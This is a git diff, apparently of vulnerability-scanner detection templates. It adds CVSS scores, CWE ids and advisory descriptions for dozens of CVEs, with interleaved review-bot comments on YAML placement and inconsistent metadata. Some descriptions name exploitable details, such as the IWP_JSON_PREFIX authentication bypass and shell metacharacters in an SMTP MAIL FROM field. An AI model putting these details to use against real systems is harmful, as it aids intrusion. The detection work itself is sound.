+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10.00
+ cve-id: CVE-2020-6287
+ cwe-id: CWE-306
 requests:
 - raw:
diff --git a/cves/2020/CVE-2020-6308.yaml b/cves/2020/CVE-2020-6308.yaml
index a0bb988cd8..7ff8dd8f94 100644
--- a/cves/2020/CVE-2020-6308.yaml
+++ b/cves/2020/CVE-2020-6308.yaml
@@ -6,6 +6,12 @@ info:
 severity: medium
 reference: https://github.com/InitRoot/CVE-2020-6308-PoC
 tags: cve,cve2020,sap,ssrf,oob
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.30
+ cve-id: CVE-2020-6308
+ cwe-id: CWE-918
+ description: "SAP BusinessObjects Business Intelligence Platform (Web Services) versions - 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability."
 requests:
 - method: POST
diff --git a/cves/2020/CVE-2020-6637.yaml b/cves/2020/CVE-2020-6637.yaml
index 4c27c186ac..572f55b729 100644
--- a/cves/2020/CVE-2020-6637.yaml
+++ b/cves/2020/CVE-2020-6637.yaml
@@ -3,12 +3,17 @@ id: CVE-2020-6637
 info:
 name: OpenSIS v7.3 unauthenticated SQL injection
 author: pikpikcu
- severity: high
+ severity: critical
 description: openSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php.
 tags: cve,cve2020,sqli,opensis
 reference:
 - https://nvd.nist.gov/vuln/detail/CVE-2020-6637
 - https://cinzinga.com/CVE-2020-6637/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2020-6637
+ cwe-id: CWE-89
 requests:
 - method: POST
diff --git a/cves/2020/CVE-2020-7209.yaml b/cves/2020/CVE-2020-7209.yaml
index d08e8d811a..ddd44f6016 100644
--- a/cves/2020/CVE-2020-7209.yaml
+++ b/cves/2020/CVE-2020-7209.yaml
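Review bot: In the CVE-2020-6308.yaml hunk the new `description:` is emitted after the four `classification` keys, so it reads as part of that block; the collapsed view hides indentation, but if it sits under `classification:` rather than directly under `info:` the loader would presumably not treat it as the template description. Placing it beside `severity`, where the other templates in this change keep theirs, removes the ambiguity. The same trailing placement applies to the descriptions added for CVE-2020-7247, CVE-2020-8771, CVE-2020-9036 and CVE-2020-9315, and to the `reference:` list added for CVE-2020-9757.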
@@ -12,6 +12,10 @@ info:
 - https://github.com/HewlettPackard/LinuxKI/releases/tag/v6.0-2
 - https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78
 - https://www.hpe.com/us/en/home.html # vendor homepage
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2020-7209
 requests:
 - method: GET
diff --git a/cves/2020/CVE-2020-7247.yaml b/cves/2020/CVE-2020-7247.yaml
index f040fb2e36..f570b6ab86 100644
--- a/cves/2020/CVE-2020-7247.yaml
+++ b/cves/2020/CVE-2020-7247.yaml
@@ -5,6 +5,12 @@ info:
 severity: critical
 reference: https://www.openwall.com/lists/oss-security/2020/01/28/3
 tags: cve,cve2020,smtp,opensmtpd,network,rce,oob
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2020-7247
+ cwe-id: CWE-78,CWE-755
+ description: "smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the \"uncommented\" default configuration. The issue exists because of an incorrect return value upon failure of input validation."
 network:
 - inputs:
diff --git a/cves/2020/CVE-2020-7318.yaml b/cves/2020/CVE-2020-7318.yaml
index 0d6ceac8da..7f5f53afc6 100644
--- a/cves/2020/CVE-2020-7318.yaml
+++ b/cves/2020/CVE-2020-7318.yaml
@@ -13,6 +13,11 @@ info:
 reference:
 - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/
 tags: cve,cve2020,xss
+ classification:
+ cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 4.30
+ cve-id: CVE-2020-7318
+ cwe-id: CWE-79
 requests:
 - raw:
diff --git a/cves/2020/CVE-2020-7796.yaml b/cves/2020/CVE-2020-7796.yaml
index 1ca340cabb..3c7e70486f 100644
--- a/cves/2020/CVE-2020-7796.yaml
+++ b/cves/2020/CVE-2020-7796.yaml
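Review bot: The classification block added to CVE-2020-7209.yaml has no `cwe-id`, while every other block in this change carries one; the hunk header's `+12,10` confirms only four keys were added. If a weakness class is recorded for this CVE, add `cwe-id: CWE-NNN` (placeholder, fill from the advisory) under `cve-id`; if none is assigned, a one-line comment saying so keeps the blocks uniform for consumers that key on the field.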
@@ -8,6 +8,11 @@ info:
 reference:
 - https://www.adminxe.com/2183.html
 tags: cve,cve2020,zimbra,ssrf,oob
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2020-7796
+ cwe-id: CWE-918
 requests:
 - raw:
diff --git a/cves/2020/CVE-2020-7961.yaml b/cves/2020/CVE-2020-7961.yaml
index 9f314f0f40..dd62e8fa68 100644
--- a/cves/2020/CVE-2020-7961.yaml
+++ b/cves/2020/CVE-2020-7961.yaml
@@ -10,6 +10,11 @@ info:
 - https://www.synacktiv.com/en/publications/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html
 - https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html
 - https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2020-7961
+ cwe-id: CWE-502
 requests:
 - raw:
diff --git a/cves/2020/CVE-2020-8091.yaml b/cves/2020/CVE-2020-8091.yaml
index 0e62f1aae1..96ccd5bd0a 100644
--- a/cves/2020/CVE-2020-8091.yaml
+++ b/cves/2020/CVE-2020-8091.yaml
@@ -9,6 +9,11 @@ info:
 reference:
 - https://typo3.org/security/advisory/typo3-psa-2019-003/
 - https://www.purplemet.com/blog/typo3-xss-vulnerability
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2020-8091
+ cwe-id: CWE-79
 requests:
 - method: GET
diff --git a/cves/2020/CVE-2020-8115.yaml b/cves/2020/CVE-2020-8115.yaml
index f12449e30e..f38b0a3567 100644
--- a/cves/2020/CVE-2020-8115.yaml
+++ b/cves/2020/CVE-2020-8115.yaml
@@ -10,6 +10,11 @@ info:
 - https://hackerone.com/reports/775693
 - https://www.revive-adserver.com/security/revive-sa-2020-001/
 tags: cve,cve2020,xss
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2020-8115
+ cwe-id: CWE-79
 requests:
 - method: GET
diff --git a/cves/2020/CVE-2020-8163.yaml b/cves/2020/CVE-2020-8163.yaml
index 396f4c1b06..b638675ca1 100644
--- a/cves/2020/CVE-2020-8163.yaml
+++ b/cves/2020/CVE-2020-8163.yaml
@@ -7,6 +7,11 @@ info:
 description: Tests for ability to pass user parameters as local variables into partials
 reference: https://correkt.horse/ruby/2020/08/22/CVE-2020-8163/
 tags: cve,cve2020,rails,rce
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.80
+ cve-id: CVE-2020-8163
+ cwe-id: CWE-94
 requests:
 - method: GET
diff --git a/cves/2020/CVE-2020-8191.yaml b/cves/2020/CVE-2020-8191.yaml
index 653c89b7d0..850e1e43ea 100644
--- a/cves/2020/CVE-2020-8191.yaml
+++ b/cves/2020/CVE-2020-8191.yaml
@@ -3,11 +3,16 @@ id: CVE-2020-8191
 info:
 name: Citrix ADC & NetScaler Gateway Reflected XSS
 author: dwisiswant0
- severity: high
+ severity: medium
 tags: cve,cve2020,citrix,xss
 reference: https://support.citrix.com/article/CTX276688
 description: |
 Improper input validation in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows reflected Cross Site Scripting (XSS).
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2020-8191
+ cwe-id: CWE-79
 requests:
 - raw:
diff --git a/cves/2020/CVE-2020-8193.yaml b/cves/2020/CVE-2020-8193.yaml
index b63ac93a82..286402bddc 100644
--- a/cves/2020/CVE-2020-8193.yaml
+++ b/cves/2020/CVE-2020-8193.yaml
@@ -3,12 +3,17 @@ id: CVE-2020-8193
 info:
 name: Citrix unauthenticated LFI
 author: pdteam
- severity: high
+ severity: medium
 reference:
 - https://github.com/jas502n/CVE-2020-8193
 - http://packetstormsecurity.com/files/160047/Citrix-ADC-NetScaler-Local-File-Inclusion.html
 description: Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints.
 tags: cve,cve2020,citrix,lfi
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
+ cvss-score: 6.50
+ cve-id: CVE-2020-8193
+ cwe-id: CWE-862
 requests:
 - raw:
diff --git a/cves/2020/CVE-2020-8194.yaml b/cves/2020/CVE-2020-8194.yaml
index 1c08f85a0f..70af4732d1 100644
--- a/cves/2020/CVE-2020-8194.yaml
+++ b/cves/2020/CVE-2020-8194.yaml
@@ -3,10 +3,15 @@ id: CVE-2020-8194
 info:
 name: Citrix ADC & NetScaler Gateway Reflected Code Injection
 author: dwisiswant0
- severity: high
+ severity: medium
 tags: cve,cve2020,citrix
 description: Reflected code injection in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows the modification of a file download.
 reference: https://support.citrix.com/article/CTX276688
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
+ cvss-score: 6.50
+ cve-id: CVE-2020-8194
+ cwe-id: CWE-94
 requests:
 - raw:
diff --git a/cves/2020/CVE-2020-8209.yaml b/cves/2020/CVE-2020-8209.yaml
index 6b7489c55f..6b809abb63 100644
--- a/cves/2020/CVE-2020-8209.yaml
+++ b/cves/2020/CVE-2020-8209.yaml
@@ -12,6 +12,11 @@ info:
 reference:
 - https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/
 tags: cve,cve2020,citrix,lfi
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2020-8209
+ cwe-id: CWE-22
 requests:
 - method: GET
diff --git a/cves/2020/CVE-2020-8512.yaml b/cves/2020/CVE-2020-8512.yaml
index d63d614467..8db1c6dddd 100644
--- a/cves/2020/CVE-2020-8512.yaml
+++ b/cves/2020/CVE-2020-8512.yaml
@@ -9,6 +9,11 @@ info:
 - https://www.exploit-db.com/exploits/47988
 - https://twitter.com/sagaryadav8742/status/1275170967527006208
 tags: cve,cve2020,xss
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2020-8512
+ cwe-id: CWE-79
 requests:
 - method: GET
diff --git a/cves/2020/CVE-2020-8515.yaml b/cves/2020/CVE-2020-8515.yaml
index da3aec26dd..05ec699777 100644
--- a/cves/2020/CVE-2020-8515.yaml
+++ b/cves/2020/CVE-2020-8515.yaml
@@ -9,6 +9,11 @@ info:
 - https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)
 - https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/
 tags: cve,cve2020,rce
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2020-8515
+ cwe-id: CWE-78
 requests:
 - raw:
diff --git a/cves/2020/CVE-2020-8771.yaml b/cves/2020/CVE-2020-8771.yaml
index 5cf989eb97..6a244c4df1 100644
--- a/cves/2020/CVE-2020-8771.yaml
+++ b/cves/2020/CVE-2020-8771.yaml
@@ -6,6 +6,12 @@ info:
 severity: critical
 reference: https://github.com/SECFORCE/WPTimeCapsulePOC
 tags: cve,cve2020,wordpress,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2020-8771
+ cwe-id: CWE-287
+ description: "The Time Capsule plugin before 1.21.16 for WordPress has an authentication bypass. Any request containing IWP_JSON_PREFIX causes the client to be logged in as the first account on the list of administrator accounts."
 requests:
 - raw:
diff --git a/cves/2020/CVE-2020-8813.yaml b/cves/2020/CVE-2020-8813.yaml
index 0a036e89a5..988906da9e 100644
--- a/cves/2020/CVE-2020-8813.yaml
+++ b/cves/2020/CVE-2020-8813.yaml
@@ -3,11 +3,16 @@ id: CVE-2020-8813
 info:
 name: Cacti v1.2.8 - Unauthenticated Remote Code Execution
 author: gy741
- severity: critical
+ severity: high
 description: This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability
 reference:
 - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/
 tags: cve,cve2020,cacti,rce,oob
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.80
+ cve-id: CVE-2020-8813
+ cwe-id: CWE-78
 requests:
 - raw:
diff --git a/cves/2020/CVE-2020-8982.yaml b/cves/2020/CVE-2020-8982.yaml
index 74819b7066..34b82f700e 100644
--- a/cves/2020/CVE-2020-8982.yaml
+++ b/cves/2020/CVE-2020-8982.yaml
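Review bot: In the CVE-2020-8813.yaml hunk the new vector `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` and the severity downgrade to high encode an attack that needs low privileges, while the unchanged `name` still reads "Unauthenticated Remote Code Execution" and the context description says no authentication is needed when the guest realtime-graphs privilege is enabled. The template's metadata now contradicts itself, which matters for anyone triaging findings by severity or name. Either rename the template to match the scored vector, or keep the name and add to the description that the score reflects the authenticated case and the guest-privilege configuration lowers the bar. Which path the request block actually exercises is not visible in this hunk.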
@@ -7,6 +7,11 @@ info:
 description: An unauthenticated arbitrary file read issue exists in all versions of Citrix ShareFile StorageZones (aka storage zones) Controller, including the most recent 5.10.x releases as of May 2020.
 tags: cve,cve2020,citrix,lfi
 reference: https://support.citrix.com/article/CTX269106
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2020-8982
+ cwe-id: CWE-22
 requests:
 - method: GET
diff --git a/cves/2020/CVE-2020-9036.yaml b/cves/2020/CVE-2020-9036.yaml
index 1f7d2d46bb..e19606cf3b 100644
--- a/cves/2020/CVE-2020-9036.yaml
+++ b/cves/2020/CVE-2020-9036.yaml
@@ -8,6 +8,12 @@ info:
 - https://sysdream.com/news/lab/2020-08-05-cve-2020-9036-jeedom-xss-leading-to-remote-code-execution/
 - https://nvd.nist.gov/vuln/detail/CVE-2020-9036
 tags: cve,cve2020,xss,jeedom
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2020-9036
+ cwe-id: CWE-79
+ description: "Jeedom through 4.0.38 allows XSS."
 requests:
 - method: GET
diff --git a/cves/2020/CVE-2020-9047.yaml b/cves/2020/CVE-2020-9047.yaml
index b7e04c9990..29d78f3858 100644
--- a/cves/2020/CVE-2020-9047.yaml
+++ b/cves/2020/CVE-2020-9047.yaml
@@ -21,6 +21,11 @@ info:
 - https://www.johnsoncontrols.com/cyber-solutions/security-advisories
 - https://www.us-cert.gov/ics/advisories/ICSA-20-170-01
 tags: cve,cve2020,rce
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.20
+ cve-id: CVE-2020-9047
+ cwe-id: CWE-347
 requests:
 - method: GET
diff --git a/cves/2020/CVE-2020-9054.yaml b/cves/2020/CVE-2020-9054.yaml
index ff2a299a2b..e7fb124544 100644
--- a/cves/2020/CVE-2020-9054.yaml
+++ b/cves/2020/CVE-2020-9054.yaml
@@ -19,6 +19,11 @@ info:
 - https://krebsonsecurity.com/2020/02/zyxel-fixes-0day-in-network-storage-devices/
 - https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml
 tags: cve,cve2020,rce
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2020-9054
+ cwe-id: CWE-78
 requests:
 - method: GET
diff --git a/cves/2020/CVE-2020-9315.yaml b/cves/2020/CVE-2020-9315.yaml
index f244463bf9..14eed4ccd2 100644
--- a/cves/2020/CVE-2020-9315.yaml
+++ b/cves/2020/CVE-2020-9315.yaml
@@ -6,6 +6,12 @@ info:
 severity: high
 reference: https://www.cvebase.com/cve/2020/9315
 tags: cve,cve2020,oracle
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2020-9315
+ cwe-id: CWE-306
+ description: "** PRODUCT NOT SUPPORTED WHEN ASSIGNED ** Oracle iPlanet Web Server 7.0.x has Incorrect Access Control for admingui/version URIs in the Administration console, as demonstrated by unauthenticated read access to encryption keys. NOTE: a related support policy can be found in the www.oracle.com references attached to this CVE."
 requests:
 - method: GET
diff --git a/cves/2020/CVE-2020-9344.yaml b/cves/2020/CVE-2020-9344.yaml
index c36d080c80..760e443f9a 100644
--- a/cves/2020/CVE-2020-9344.yaml
+++ b/cves/2020/CVE-2020-9344.yaml
@@ -10,6 +10,11 @@ info:
 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9344
 - https://kintosoft.atlassian.net/wiki/spaces/SVNALM/pages/753565697/Security+Bulletin
 - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-007.txt
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2020-9344
+ cwe-id: CWE-79
 requests:
 - method: GET
diff --git a/cves/2020/CVE-2020-9376.yaml b/cves/2020/CVE-2020-9376.yaml
index 66b1211b6b..a8e7f8c014 100644
--- a/cves/2020/CVE-2020-9376.yaml
+++ b/cves/2020/CVE-2020-9376.yaml
@@ -13,6 +13,11 @@ info:
 - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10182
 - https://www.dlink.com.br/produto/dir-610/
 tags: cve,cve2020,dlink
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2020-9376
+ cwe-id: CWE-74
 requests:
 - method: POST
 path:
diff --git a/cves/2020/CVE-2020-9402.yaml b/cves/2020/CVE-2020-9402.yaml
index c9f38d9a42..172130f2c4 100644
--- a/cves/2020/CVE-2020-9402.yaml
+++ b/cves/2020/CVE-2020-9402.yaml
@@ -10,6 +10,11 @@ info:
 author: geeknik
 severity: high
 tags: cve,cve2020,django,sqli
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.80
+ cve-id: CVE-2020-9402
+ cwe-id: CWE-89
 requests:
 - method: GET
diff --git a/cves/2020/CVE-2020-9425.yaml b/cves/2020/CVE-2020-9425.yaml
index 2336c16344..239b63a125 100644
--- a/cves/2020/CVE-2020-9425.yaml
+++ b/cves/2020/CVE-2020-9425.yaml
@@ -8,6 +8,11 @@ info:
 - https://blog.hivint.com/rconfig-3-9-3-unauthenticated-sensitive-information-disclosure-ead4ed88f153
 - https://github.com/rconfig/rconfig/commit/20f4e3d87e84663d922b937842fddd9af1b68dd9
 tags: cve,cve2020,rconfig
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2020-9425
+ cwe-id: CWE-670
 requests:
 - method: GET
diff --git a/cves/2020/CVE-2020-9483.yaml b/cves/2020/CVE-2020-9483.yaml
index e0017d5eda..ef8f233909 100644
--- a/cves/2020/CVE-2020-9483.yaml
+++ b/cves/2020/CVE-2020-9483.yaml
@@ -8,6 +8,11 @@ info:
 When use H2/MySQL/TiDB as Apache SkyWalking storage, the metadata query through GraphQL protocol, there is a SQL injection vulnerability, which allows to access unpexcted data. Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don't use the appropriate way to set SQL parameters.
 reference: https://github.com/apache/skywalking/pull/4639
 tags: cve,cve2020,sqli,skywalking
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2020-9483
+ cwe-id: CWE-89
 requests:
 - method: POST
diff --git a/cves/2020/CVE-2020-9484.yaml b/cves/2020/CVE-2020-9484.yaml
index 4765190c8e..95f1a4eec0 100644
--- a/cves/2020/CVE-2020-9484.yaml
+++ b/cves/2020/CVE-2020-9484.yaml
@@ -14,6 +14,11 @@ info:
 tags: cve,cve2020,apache
 reference:
 - http://packetstormsecurity.com/files/157924/Apache-Tomcat-CVE-2020-9484-Proof-Of-Concept.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.00
+ cve-id: CVE-2020-9484
+ cwe-id: CWE-502
 requests:
 - method: GET
diff --git a/cves/2020/CVE-2020-9490.yaml b/cves/2020/CVE-2020-9490.yaml
index cd341cf256..583cee2db1 100644
--- a/cves/2020/CVE-2020-9490.yaml
+++ b/cves/2020/CVE-2020-9490.yaml
@@ -2,7 +2,7 @@ id: CVE-2020-9490
 info:
 name: CVE-2020-9490
- severity: medium
+ severity: high
 description: Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the 'Cache-Digest' header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers.
 author: philippedelteil
 tags: cve,cve2020,apache,dos
@@ -11,6 +11,11 @@ info:
- https://bugs.chromium.org/p/project-zero/issues/detail?id=2030
- https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=443369
- https://nvd.nist.gov/vuln/detail/CVE-2020-9490
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
+ cvss-score: 7.50
+ cve-id: CVE-2020-9490
+ cwe-id: CWE-444
requests:
- method: GET
diff --git a/cves/2020/CVE-2020-9496.yaml b/cves/2020/CVE-2020-9496.yaml
index d8143b9e67..062a835761 100644
--- a/cves/2020/CVE-2020-9496.yaml
+++ b/cves/2020/CVE-2020-9496.yaml
@@ -10,6 +10,11 @@ info:
- http://packetstormsecurity.com/files/158887/Apache-OFBiz-XML-RPC-Java-Deserialization.html
- http://packetstormsecurity.com/files/161769/Apache-OFBiz-XML-RPC-Java-Deserialization.html
- https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2020-9496
+ cwe-id: CWE-79,CWE-502
requests:
- raw:
diff --git a/cves/2020/CVE-2020-9757.yaml b/cves/2020/CVE-2020-9757.yaml
index c9ef094170..fac0befccd 100644
--- a/cves/2020/CVE-2020-9757.yaml
+++ b/cves/2020/CVE-2020-9757.yaml
@@ -6,6 +6,16 @@ info:
severity: high
description: The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller.
tags: cve,cve2020,ssti
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2020-9757
+ cwe-id: CWE-74
+ reference:
+ - https://github.com/nystudio107/craft-seomatic/blob/v3/CHANGELOG.md
+ - https://github.com/giany/CVE/blob/master/CVE-2020-9757.txt
+ - https://github.com/nystudio107/craft-seomatic/commit/65ab659cb6c914c7ad671af1e417c0da2431f79b
+ - https://github.com/nystudio107/craft-seomatic/commit/a1c2cad7e126132d2442ec8ec8e9ab43df02cc0f
requests:
- method: GET
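Review bot: The `reference:` list added to CVE-2020-9757.yaml sits after the `cwe-id` entry, and the collapsed diff does not show whether it is indented at the `info` level or one level deeper under `classification:`; the same applies to the `description:` line added after the classification block in CVE-2021-24235.yaml further down. As far as I know the classification mapping only defines the cvss-metrics/cvss-score/cve-id/cwe-id keys, so either field nested there would be dropped silently and the template would still load while losing its references or description. Worth checking the indentation of both, and keeping `reference`/`description` grouped with `name`/`severity`/`tags` as the other templates in this commit do. In both files the `info:` mapping starts above the hunk.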
diff --git a/cves/2021/CVE-2021-1497.yaml b/cves/2021/CVE-2021-1497.yaml
index 35aef60dbd..0074e7885d 100644
--- a/cves/2021/CVE-2021-1497.yaml
+++ b/cves/2021/CVE-2021-1497.yaml
@@ -15,6 +15,11 @@ info:
- https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution
- https://github.com/EdgeSecurityTeam/Vulnerability/blob/c0af411de9adb82826303c5b05a0d766fb553f28/Cisco%20HyperFlex%20HX%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%EF%BC%88CVE-2021-1497-CVE-2021-1498%EF%BC%89.md
tags: cve,cve2021,cisco,rce,oob
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2021-1497
+ cwe-id: CWE-78
requests:
- raw:
diff --git a/cves/2021/CVE-2021-20090.yaml b/cves/2021/CVE-2021-20090.yaml
index 9c9c57c372..f0e0214349 100644
--- a/cves/2021/CVE-2021-20090.yaml
+++ b/cves/2021/CVE-2021-20090.yaml
@@ -11,6 +11,11 @@ info:
- https://www.tenable.com/security/research/tra-2021-13
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
tags: cve,cve2021,lfi,buffalo,firmware,iot
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2021-20090
+ cwe-id: CWE-22
requests:
- raw:
diff --git a/cves/2021/CVE-2021-20091.yaml b/cves/2021/CVE-2021-20091.yaml
index 6ac0d4f526..650be7cd88 100644
--- a/cves/2021/CVE-2021-20091.yaml
+++ b/cves/2021/CVE-2021-20091.yaml
@@ -3,7 +3,7 @@ id: CVE-2021-20091
info:
name: Buffalo WSR-2533DHPL2 - Configuration File Injection
author: gy741,pdteam,parth
- severity: critical
+ severity: high
description: |
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution.
reference:
@@ -11,6 +11,10 @@ info:
- https://www.tenable.com/security/research/tra-2021-13
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
tags: cve,cve2021,buffalo,firmware,iot
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.80
+ cve-id: CVE-2021-20091
requests:
- raw:
